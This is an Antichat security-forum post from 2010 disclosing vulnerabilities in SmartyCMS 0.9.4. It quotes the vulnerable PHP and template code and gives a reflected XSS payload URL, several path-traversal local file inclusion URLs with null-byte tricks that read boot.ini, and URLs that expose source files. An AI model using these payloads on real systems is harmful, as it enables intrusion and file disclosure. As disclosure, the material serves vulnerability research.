Энциклопедия уязвимых скриптов

#11

22.01.2010, 23:38

nikp

Reservists Of Antichat - Level 6

Регистрация: 19.09.2008

Сообщений: 127

Провел на форуме:
835386

Репутация: 1463

SmartyCMS
http://sunet.dl.sourceforge.net/project/smartycms/smartycms/0.9.4 build 334/smartycms-0.9.4-334.zip

Passive XSS
http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&cmsUserRole=1>'><script>al ert(121212);</script>

----------------

js/tiny_mce/plugins/ibrowser/scripts/loadmsg.php

PHP код:


		
			
$l = (isset($_REQUEST['lang']) ? new PLUG_Lang($_REQUEST['lang']) : new PLUG_Lang($cfg['lang']));

$l->setBlock('ibrowser');

js/tiny_mce/plugins/ibrowser/langs/lang.class.php

PHP код:


		
			
function setBlock( $value ) {

$this -> block = $value;



function getLang() {

$this -> lang = $value;



function loadData() {

global $cfg;

include( dirname(__FILE__) . '/' . $this -> lang.'.php' );

LFI
mq=off
http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/loadmsg.php?lang=../../../../../../../../../../boot.ini%00
аналогично
http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=../../../../../../../../../../boot.ini%00
http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/symbols.php?lang=../../../../../../../../../../boot.ini%00

----------------

config/smartycms.config.php

PHP код:


		
			
// url request param name for template call

$smartycms['config']['PageCallParamName'] = 'page';

libraries/smarty-cms/Smarty_cms.php

PHP код:


		
			
        // read default template name from given url param

        if (!$resource_name && !empty($smartycms['config']['PageCallParamName']))

          if ( !empty($_REQUEST[$smartycms['config']['PageCallParamName']]) )

          {

            $page = $_REQUEST[$smartycms['config']['PageCallParamName']];

            $ext  = strrchr($page, '.'); 



            if($ext !== false) $resource_name = substr($page, 0, -strlen($ext)); else $resource_name = $page;

            

            $resource_name .= '.'.$smartycms['config']['TemplateFileExtension'];

          }

libraries/smarty/Smarty.class.php

PHP код:


		
			
        if ($display && !$this->caching && count($this->_plugins['outputfilter']) == 0) {

            if ($this->_is_compiled($resource_name, $_smarty_compile_path)

                    || $this->_compile_resource($resource_name, $_smarty_compile_path))

            {

                include($_smarty_compile_path);

            }

LFI
mq=off
http://localhost/smartycms-0.9.4-334/index.php?page=/boot.ini%00.html

----------------
templates/handler/book_content_handler.php

PHP код:


		
			
  function book_content_handler($params, &$smarty)

  {

    global $smartycms;

    // create individual chapter id

    if (!$_GET['chapterid'] || $_GET['chapterid']=="1") $chapterid=time(); else $chapterid=$_GET['chapterid'];

    

    // send content to template

    $smarty->assign("chapterid",$chapterid);

    $smarty->assign("book_chapter_id","book_chapter_".$chapterid);

    $smarty->assign("book_content_id","book_content_".$chapterid);

  }

templates/tutorial.tpl

PHP код:


		
			
{* Tutorial content block *}

{include file="modules/book_content.tpl" pid="smartycms_tutorial"}<br>

templates/modules/book_content.tpl

PHP код:


		
			
{if $smarty.request.chapterid}

<a name="start"></a>

<div class="cms_book_headline">{cms id="$book_chapter_id" theme="singleline" pid=$pid title="edit chapter headline"}Please insert here the chapter headline{/cms}</div><br>

{cms id="$book_content_id" pid=$pid title="edit chapter content" height="250" smartytags="0"}<div class="cms_book_bodytext">Please insert here the chapter content</div>{/cms}<br><br>

{/if}

view source
http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&chapterid=../../../../../../../../../../boot.ini
http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&chapterid=../../../../../index.php

ANTICHAT — форум по информационной безопасности, OSINT и технологиям